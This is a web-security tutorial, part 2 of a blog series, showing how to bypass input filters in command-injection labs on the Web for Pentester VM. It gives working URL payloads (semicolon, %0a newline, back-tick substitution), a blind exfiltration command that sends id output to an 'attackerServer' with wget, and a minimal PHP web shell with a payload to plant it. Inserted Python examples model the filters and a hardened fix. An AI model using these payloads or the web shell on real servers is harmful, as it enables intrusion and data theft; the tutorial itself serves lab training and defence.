Command Injection vulnerability in Web Applications : Part 2 | Bypass Security Checks

In this post we are going to look at some of the security implementations and data-sanitization techniques used to mitigate the command injection vulnerability, and at how to bypass them. For the basics of the Command Injection vulnerability please visit my previous post :

        Command Injection : Part 1 | Introduction

Note : I am going to use the Web for Pentester VM for the examples. To install it on your system visit the link below :

        http://www.sec-art.net/2018/03/how-to-install-web-for-pentester-vm-in.html


Example 1 : 

In the example 1 code there are no security checks of any kind: the ip parameter is passed straight to the shell.


We can simply append a command after a separator such as ';' :
 /commandexec/example1.php?ip=127.0.0.1; ls

Example 1 is a generic command injection.

Example 2 :

In example 2, a regular expression is used to filter the user input.


"preg_match()" is a built-in PHP function used for regular-expression matching; it returns 1 if the pattern matches the input and 0 if it does not.


In the above regex :
  • '^' denotes the start of the line (or of the whole string when no modifier is used)
  • '\d{1,3}' matches one to three decimal digits, i.e. one octet
  • '\.' matches a literal dot character (an unescaped '.' would match any character)
  • '$' at the end denotes the end of the line (or of the whole string)
  • the '\' characters are regex escapes: '\d' selects the digit class and '\.' turns the dot into a literal
The above regex only allows input in the form of an IP address, such as 127.0.0.1 or 192.168.150.100 (it does not check that each octet is 255 or less, so 999.0.0.1 also passes). But note the 'm' character after the closing delimiter of the pattern: it is the multi-line modifier. In PHP, regex modifiers change how the engine applies the pattern to the input string, and the multi-line modifier changes how the beginning (^) and end ($) anchors behave.

When the modifier is absent, ^ and $ match only at the start and end of the whole string. With it, they also match at the start and end of every line inside the string. So if the input contains a line break, the text before the break is matched as a complete IP address, the check passes, and whatever follows the break goes straight to the shell, where a newline separates commands just like ';' does. We therefore URL-encode a line feed as %0a and put our payload after it. Example :
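To make the effect of the modifier concrete, here is an added Python example (not code from the original post or from the Web for Pentester VM) that reimplements the check with Python's re module. It assumes the pattern is the one described above, four groups of one to three digits separated by literal dots and anchored with ^ and $, with only the multi-line flag differing between example 2 and example 3. It runs the payloads from this post through both loose checks and through a hardened validator, and also shows two things the text above does not: even without the modifier, $ still matches before a single trailing newline, and the regex accepts octets above 255.

```python
import ipaddress
import re

# Pattern modelled on the check described in the post (assumption: four 1-3
# digit groups, literal dots, anchored; only the "m" modifier differs between
# example 2 and example 3). Note that in Python str patterns \d also matches
# non-ASCII digits; the hardened version below uses [0-9] instead.
IP_PATTERN = r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$"


def filter_example2(ip: str) -> bool:
    """Regex with the multi-line modifier: ^ and $ match at every line break."""
    return re.search(IP_PATTERN, ip, re.MULTILINE) is not None


def filter_example3(ip: str) -> bool:
    """Same regex without the modifier: ^ and $ anchor to the whole string,
    except that $ still matches before one trailing newline (PCRE and Python
    share this default)."""
    return re.search(IP_PATTERN, ip) is not None


def validate_ip(ip: str) -> bool:
    """Hardened check: fullmatch (no trailing-newline exception), ASCII digits
    only, and ipaddress rejects octets above 255."""
    if re.fullmatch(r"[0-9]{1,3}(\.[0-9]{1,3}){3}", ip) is None:
        return False
    try:
        ipaddress.IPv4Address(ip)
    except ValueError:
        return False
    return True


# Constructed inputs: the legitimate value plus the payloads used in this post.
PAYLOADS = {
    "clean": "127.0.0.1",
    "semicolon": "127.0.0.1; ls",         # example 1 style
    "newline": "127.0.0.1\nls",           # example 2 style, %0a on the wire
    "trailing_newline": "127.0.0.1\n",    # $ matches before a final newline
    "backticks": "127.0.0.1 `sleep 10`",  # example 3 style
    "bad_octet": "999.0.0.1",             # passes both regexes
}


def run_filters() -> dict:
    """Return {name: (example2_passes, example3_passes, hardened_passes)}."""
    return {name: (filter_example2(p), filter_example3(p), validate_ip(p))
            for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    for name, (ex2, ex3, hard) in run_filters().items():
        print(f"{name:17} example2={ex2!s:5} example3={ex3!s:5} hardened={hard}")
```

The newline payload is the only one that passes example 2 but not example 3, which is exactly the difference the 'm' modifier makes; the trailing-newline and bad-octet rows show why a regex alone is a weak validator even when anchored correctly.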
 /commandexec/example2.php?ip=127.0.0.1%0als

And it works. Example 2 is still a generic command injection; the filter only changes which separator we have to use.

Example3 :

Example 3 uses a regular expression similar to the one in example 2.


There is one small difference: in example 3 the multi-line modifier is not used, so the line-break trick no longer gets past the check.

In this situation we can use back-ticks `command` within the input. Example :
 /commandexec/example3.php?ip=127.0.0.1 `command_to_run`
When the shell parses the above input, everything between the back-ticks is executed first and its output is substituted into the command line; the resulting line (ping plus whatever the substitution produced) is executed afterwards. This is known as command substitution. Because the command between the back-ticks always runs, it does not matter if the ping command that follows fails. Note, though, that the regex itself has not been fooled: an anchored pattern without the multi-line modifier does not match a string containing a space and back-ticks, so preg_match() fails. The injection works because example 3 reacts to a failed check by sending a redirect to example3.php?ip=127.0.0.1 without stopping the script, so the system() call still runs with our input. That redirect is also why we never see the output: the injection is blind.
 /commandexec/example3.php?ip=127.0.0.1 `sleep 10`

The delay confirms that the command runs. Since this is blind command injection (the output is never returned in the response), we extract data by making the server send it to a host we control :
 /commandexec/example3.php?ip=127.0.0.1 `wget http://attackerServer:Port/$(id)`
The output of id contains spaces, so only its first word ends up in the URL path; pipe it through base64 -w0 (or tr ' ' '_') if you want the whole line in one request.

I am using a simple python server on port 8080.


And it also works.
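The following added Python example (again not code from the original post or from the VM) models example 3 end to end so the behaviour above can be reproduced offline. It assumes, as the Web for Pentester source does, that a failed match only sets a redirect and the script continues to the system() call; `echo` stands in for `ping -c 2` so the command is harmless and deterministic. It shows that the anchored regex without the multi-line modifier rejects the back-tick payload, that the shell still performs command substitution on it, that the caller only gets the redirect back (hence blind), and that passing the value as a separate argv element instead of a shell string leaves the back-ticks as literal text.

```python
import re
import subprocess

# Example 3 pattern as described in the post: anchored, no multi-line modifier.
IP_PATTERN = r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$"


def check_ip(ip: str) -> bool:
    """The example 3 filter. The back-tick payload does NOT pass this."""
    return re.search(IP_PATTERN, ip) is not None


def example3_handler(ip: str) -> tuple:
    """Model of the vulnerable handler (assumption: on a failed check the
    script sets a Location header but never exits, so execution continues).

    Returns (redirect_header_or_None, command_stdout). `echo` replaces
    `ping -c 2` so the example runs without network access.
    """
    redirect = None
    if not check_ip(ip):
        redirect = "Location: example3.php?ip=127.0.0.1"
    # The injection point: untrusted input concatenated into a shell string,
    # the same shape as system("ping -c 2 " . $_GET['ip']) in PHP.
    result = subprocess.run(["sh", "-c", "echo " + ip],
                            capture_output=True, text=True)
    return redirect, result.stdout


def run_without_shell(ip: str) -> str:
    """Hardened variant: no shell is involved and the value is one argv
    element, so back-ticks and $(...) are never interpreted."""
    result = subprocess.run(["echo", ip], capture_output=True, text=True)
    return result.stdout


# Constructed payload: the post's `sleep 10` replaced by a visible marker.
PAYLOAD = "127.0.0.1 `echo INJECTED`"

if __name__ == "__main__":
    print("filter accepts payload:", check_ip(PAYLOAD))          # False
    redirect, output = example3_handler(PAYLOAD)
    print("attacker receives:", redirect)                         # the redirect only
    print("server actually ran:", output.strip())                 # 127.0.0.1 INJECTED
    print("without shell:", run_without_shell(PAYLOAD).strip())   # literal back-ticks
```

The fix for the real application is the combination of both halves: stop the script when validation fails (exit after the redirect) and never hand user input to a shell string in the first place.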

Uploading a web shell to the vulnerable server :

We are going to use a very simple php shell.

Filename : shell.php
<?php
  // Minimal web shell: runs whatever is passed in the 'cmd' parameter
  // as the web server's user and returns its output in the response.
  $cmd = $_GET['cmd'];
  system($cmd);
?>
Payload :
 /commandexec/example3.php?ip=127.0.0.1 `wget http://attackerServer/shell.php`

Our file server logs a request for shell.php from the vulnerable server. wget saves the file in the web server process's current working directory, here /commandexec/, so this step only works if that directory is writable by the web server's user.


Now we can execute commands on the target server through the uploaded shell.
 /commandexec/shell.php?cmd=command_name


Conclusion :

In this post we looked at some techniques to bypass the security checks placed in front of a command injection vulnerability. Visit the link for more tutorials about Web Security :  http://www.sec-art.net/p/web-security.html